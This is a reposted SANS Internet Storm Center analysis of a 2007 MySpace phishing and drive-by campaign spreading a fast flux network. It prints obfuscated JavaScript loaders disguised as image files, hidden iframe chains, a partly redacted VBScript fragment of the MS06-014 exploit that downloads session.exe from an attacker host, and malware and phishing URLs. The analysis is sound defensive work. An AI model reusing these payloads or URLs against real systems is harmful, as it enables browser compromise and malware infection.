Friday, June 29, 2007 8:24 AM cmosby

SANS Internet Storm Center - MySpace Phish/Drive-by attack vector propagating Fast Flux network growth

 

UPDATE!  2007-06-28

MySpace Phish/Drive-by attack vector propagating Fast Flux network growth

Two primary infection vectors have been observed providing us with unique insight into the life cycle involved in propagating a fast flux service network.  The attack vectors include:

  • Compromised MySpace Member profiles redirecting to phishing sites (this has been discussed here)
  • SWF Flash image malicious redirection to Phishing and drive-by browser exploit attempt.

All Flash redirects were observed redirecting browsers to http://www.e44 7aa2.com    (****CAREFUL****)
( e447aa2.com is a domain currently serviced by this flux network with wildcard DNS resolution )

$ GET http://www.e44 7aa2.com

<HTML>
<HEAD>
<meta http-equiv="refresh" content="1;url=http://login.my space.cfm.fuseaction.splash.myto ken.76701a26.da3e.44a3a17b.e44 7aa2.com/da3e/index.php" />
</HEAD>
</HTML>

(The above URL is only a single example of potentially infinite permutations)

By following the above /da3e/index.php link results in a credible looking MySpace landing page (serviced in flux) with the most interesting footer element displayed below:

<!-- onRequestEnd -->
<script>window.status="Done"</script><iframe src="../.footer_01.gif" width=0 height=0></iframe>

 The IFrame rendered /.footer_01.gif (not an actual gif but instead an encoded/obfuscated JavaScript snippet)

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 The decoded result of the above /.footer_01.gif is:

<script>window.status="Done"</script>
<iframe src="http://fafb 4c4c.com/header_03.gif" width=1 height=1></iframe>

 The IFrame rendered /header_03.gif (served in flux) results in another JavaScript encoded/obfuscated file:

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74

REMOVED

?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%

REMOVED

dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 For which the decoded result of the above /header_03.gif is:

<script>window.status="Done"</script>
<iframe src="http://fafb 4c4c.com/routine.php" width=1 height=1></iframe>

Following the IFrame rendered /routine.php file results in another JavaScript encoded/obfuscated file:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Routine Session ID: ca0910cWc01bT69aeA7e3030d1f52a45</title>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

\"lpwvgp%08y\"+*pmppGgnflcj\"lmkvalwd%08< vrkpaqctch-vzgv?gr{v\"vrkpaq>"));
</SCRIPT>        

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
</head>

<body onload="doesnotexist()">
<SCRIPT Language="JavaScript">
eval(unescape("

REMOVED

"));
</SCRIPT>
</body>
</html>

The decoded result of  /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) for which Microsoft released a patch in May 2006.

<script type="text/javascript">
function handleError() {
return true;
}
window.onerror = handleError;
</script>
<script>window.status="Done"</script>
<SCRIPT language="VBScript">
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0  Then
REMOVED
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "GET","http://fafb 4c4c.com/session.exe",False
obj_msxml2.send
REMOVED
End If
</SCRIPT>

The successful compromise of a windows host via this exploit content results in the download of a malicious downloader stub executable (session.exe) that is then responsible for attempting to download additional malicious components necessary for integration of new compromised hosts into a fast flux service network.

The malware stub (session.exe) above attempts to download and execute the following components:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe
http://fcs.camgenie .com/weby7.exe

Now back to these Evil Flash File Redirects:

What follows is just a representative sampling of URLs for imageshack.us site hosted flash files which perform one simple action, an action-script based browser redirect to a fast flux service network hosted combination phishing and drive by exploit that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014).

All files are exactly the same based on same md5 and sha1 hash for all files:

MD5: 6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740

Imageshack HTTP Server maintained mtime suggest a deployment time of 2007-06-05 03:56:30-0700

Decompiling a flash component results in the discovery of that terrible redirect:

$ swfdump -atp ./img527.imageshack.us/img527/3530/38023350se6.swf
[HEADER]        File version: 8
[HEADER]        File size: 98
[HEADER]        Frame rate: 120.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        28 DOACTION
                 (   24 bytes) action: GetUrl URL:"http://www.e447 aa2.com" Label:""
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END 

Where in the world are Flash files like the above being hosted?

http://img116.imagesh ack.us/img116/1299/97231039qx0.swf
http://img116.imagesh ack.us/img116/1424/81562934sa1.swf
http://img116.imagesh ack.us/img116/1699/63088115dg4.swf

REMOVED >100 URLS ( You get the idea )

http://img527.imagesh ack.us/img527/9186/77432798oc4.swf
http://img527.imagesh ack.us/img527/9573/87356429cb0.swf
http://img527.imagesh ack.us/img527/9696/66658005sg8.swf
http://img527.imagesh ack.us/img527/9828/13582837lk5.swf

Several Hundred MySpace profiles were discovered injected with links to phishing, and it is easy to imagine that many more were affected.

home.myspace.com.index.cfm.fusea ction.user.mytoken.0c38outb.h5v 17lt.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0en0r8xd.1155 34a.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0l3ttn77.oqr hldv.com

HUNDREDS OF URLS REMOVED

home.myspace.com.index.cfm.fusea ction.user.mytoken.1wr4sm8c.lw h gvcq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.257k51r.uhq0 1o6.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dd2l3w6.gcp 8tr9.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dp2cvwv.at6 pyss.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.304165k.xt3c gyq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3gcri4jk.jk33v 96.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3kuto9a4.de0 82ak.com

Flux!  It's SO easy to miss!

This write up is not geared to address the more complex overview of what a fast flux service network is (but is forthcoming).  Essentially all URLs involved in this fast flux service network are served by compromised hosts redirecting their HTTP and DNS traffic to another upstream Mothership host. 

;; ANSWER SECTION:
at6pyss.com.            179     IN      A       206.255.81.68 [h68.81.255.206.cable.htsp.cablelynx.com]
at6pyss.com.            179     IN      A       67.161.240.98 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com.            179     IN      A       67.190.48.71 [c-67-190-48-71.hsd1.co.comcast.net]
at6pyss.com.            179     IN      A       70.241.113.51 [adsl-70-241-113-51.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       70.250.117.30 [ppp-70-250-117-30.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       71.140.90.107 [ppp-71-140-90-107.dsl.frs2ca.pacbell.net]
at6pyss.com.            179     IN      A       71.146.88.77 [adsl-71-146-88-77.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       71.146.144.141 [adsl-71-146-144-141.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       75.31.235.68 [adsl-75-31-235-68.dsl.chcgil.sbcglobal.net]
at6pyss.com.            179     IN      A       76.80.255.40 [cpe-76-80-255-40.socal.res.rr.com]

Check back on the above DNS results, the same goes for any domains referenced above.

The concept of Flux may unfold before very your eyes.
;; AUTHORITY SECTION:
at6pyss.com.            172799  IN      NS      ns1.welcometothechallenge.hk.
at6pyss.com.            172799  IN      NS      ns1.kanjerida.hk.
at6pyss.com.            172799  IN      NS      ns1.phudisarida.hk.
at6pyss.com.            172799  IN      NS      ns1.myheroisyourslove.hk.

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Filed under: , ,

Comments

No Comments